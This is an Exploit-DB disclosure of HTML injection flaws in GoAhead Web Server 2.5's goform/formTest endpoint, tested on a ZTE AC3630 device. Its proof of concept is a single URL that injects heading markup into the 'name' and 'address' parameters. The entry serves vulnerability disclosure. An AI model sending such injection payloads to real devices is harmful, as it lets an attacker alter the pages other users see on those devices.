
[webapps] GoAhead Web Server 2.5 - 'goform/formTest' Multiple HTML Injection Vul...

source link: https://www.exploit-db.com/exploits/51762

GoAhead Web Server 2.5 - 'goform/formTest' Multiple HTML Injection Vulnerabilities

EDB-ID: 51762
Platform: Multiple
Date: 2024-01-31

# Exploit Title: GoAhead Web Server 2.5 - 'goform/formTest' Multiple HTML Injection Vulnerabilities
# Date: 25/9/2023
# Exploit Author: Syed Affan Ahmed (ZEROXINN)
# Vendor Homepage: https://www.embedthis.com/goahead/
# Affected Version: 2.5 (others may be affected)
# Tested On Version: 2.5 in ZTE AC3630

---------------------------POC---------------------------

GoAhead Web Server version 2.5 is prone to multiple HTML injection vulnerabilities due to inadequate input validation.

Injected HTML is rendered, and can execute, within the context of the affected site.

http://192.168.0.1/goform/formTest?name=<h1>Hello</h1>&address=<h1>World</h1>
            
